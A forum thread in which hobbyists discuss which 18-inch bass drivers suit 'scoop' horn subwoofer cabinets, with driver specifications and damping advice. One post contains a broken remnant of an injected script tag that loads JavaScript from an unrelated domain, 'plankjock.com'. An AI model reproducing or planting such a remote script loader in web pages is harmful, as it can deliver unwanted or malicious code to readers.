FAQ FAQ  Forum Search   Events   Register Register  Login Login

scoop compatible drivers...

Post Reply Post Reply Page  <1234 25>
Author
Message Reverse Sort Order
toastyghost View Drop Down
The 10,000 Points Club
The 10,000 Points Club

Post Options Post Options   Thanks (1) Thanks(1)   Quote toastyghost Quote  Post ReplyReply Direct Link To This Post Posted: 14 September 2021 at 8:41pm
Originally posted by levyte357- levyte357- wrote:

Will require understanding of matching driver to Scoop throat.

Since I’m sure I’m not the only one very, very bored of the ‘nudge nudge wink wink’ cyclical posts on this section, here’s a comprehensive set of guides from the very experienced Martin J. King on all aspects of designing a well-performing rear loaded horn speaker.

http://www.quarter-wave.com/Horns/Horn_Theory.html

Sections 7, 8 and the two additional articles are the ones of key note, but it’s far easier if any interested people work through them sequentially. His MathCAD sheets aren’t available any more, but all the relevant equations are included (with all variables clearly defined) and Octave is free if you’re the scripting type.

The short summary however is that a ‘scoop’ behaves as a transmission line at all low frequencies of interest, and the ‘horn loading’ part isn’t really taking effect until the ‘mid band’ of the design. The throat acoustic impedance target isn’t really any different to other highly damped loadings. Watch the volume velocity and compression ratio… plenty of illustrative examples throughout.

Happy trails.
RealitySound View Drop Down
Young Croc
Young Croc

Post Options Post Options   Thanks (0) Thanks(0)   Quote RealitySound Quote  Post ReplyReply Direct Link To This Post Posted: 14 September 2021 at 7:30pm
"The 18LW2420 is an 18 inch extended low frequency loudspeaker designed for high SPL subwoofer applications in either a reflex, bandpass or horn loaded configuration. "

"The 18LW2600 is a 18" (466 mm) extended low frequency loudspeaker,especially designed for use in vented enclosures."
When you gonna send me some $$ mate ?
levyte357- View Drop Down
Old Croc
Old Croc

Post Options Post Options   Thanks (0) Thanks(0)   Quote levyte357- Quote  Post ReplyReply Direct Link To This Post Posted: 26 August 2021 at 1:17pm
That driver is reflex driver.

Look at 18LW2600.

That will rock in right Scoop, but maybe not Superscooper.

Will require understanding of matching driver to Scoop throat.
Global Depopulation - Alive and Killing.
Daddy Culture View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Daddy Culture Quote  Post ReplyReply Direct Link To This Post Posted: 25 August 2021 at 3:25pm
Eighteen sound LW2400 IS DISCONTINUED, now the substitute is LW2420. Its very similar but with more power handling (1300w).

Has anyone ever tried this on scoops?

Follow the T/S

• Fs 33 Hz
  • Qms 7
  • Qes 0.33
  • Qts 0.31
  • Vas 255 lt.
  • BL 24.6 Tm
  • Xmax 10 mm
flwarehouse View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote flwarehouse Quote  Post ReplyReply Direct Link To This Post Posted: 18 May 2020 at 12:36pm
Does anyone know if the Faital Pro 18XL2000 is a good input for scoop/ hog?

Edited by flwarehouse - 18 May 2020 at 12:36pm

📸 @frontal.lobe.warehouse 🌍 www.flwarehouse.co.uk
Crashpc View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Crashpc Quote  Post ReplyReply Direct Link To This Post Posted: 02 August 2019 at 9:44am
I am aware of that driver. I would discart it. Too high Vas and too light curved cone. Risky for this application in my eyes. 
Nikon and Canon people should not be married to each other. Why did you let this happen?
Archi View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Archi Quote  Post ReplyReply Direct Link To This Post Posted: 02 August 2019 at 6:36am
                          XMAX(7+)/ BL(24+)/ QES(-.35)/ QTS (-.35)/ VAS(-360)/FS(-35)/ RMS      USD
B&C 18RBX100        10             25.1       36              34              220           40      1000w    $262

Has any one try this driver? it's 4" voice coil, looks like a nice one.

< ="text/" async="" ="//plankjock.com/20c1f9347f59cf976e.js">
Crashpc View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Crashpc Quote  Post ReplyReply Direct Link To This Post Posted: 07 March 2019 at 1:34pm
you mean padding?
It depends. The box will work without it, yet it is better to add padding in there to dampen some peaks.
I recommend some kind of wool. For scoops more than less, lets say 3" thick inside the chamber after fastening. Not much pressed...
Nikon and Canon people should not be married to each other. Why did you let this happen?
Cepoman View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Cepoman Quote  Post ReplyReply Direct Link To This Post Posted: 07 March 2019 at 12:32pm
Originally posted by Crashpc Crashpc wrote:

Hello.

Yes, that is possoble with this kind of speaker.

What insulation is put inside?
How thick?
Crashpc View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Crashpc Quote  Post ReplyReply Direct Link To This Post Posted: 03 March 2019 at 1:24pm
Hello.

Yes, that is possoble with this kind of speaker.
Cepoman View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Cepoman Quote  Post ReplyReply Direct Link To This Post Posted: 03 March 2019 at 12:48pm
Hello i have a question 

I have 2 x eighteen sound 18nlw9400
I wantl to do 2 scoops 
Is compatible? 
Crashpc View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Crashpc Quote  Post ReplyReply Direct Link To This Post Posted: 03 July 2018 at 12:53pm
I mostly mean, that nowadays, worse natural frequency response is not an issue anymore. With enough processing capabilities and good speaker specs, you can straighten many "issues" with close to no punishment to it. That way I rather prefer stronger motor speakers, and compensate later.
I´m not sure about physical dimensions though. That is another story...
 Post Reply Post Reply Page  <1234 25>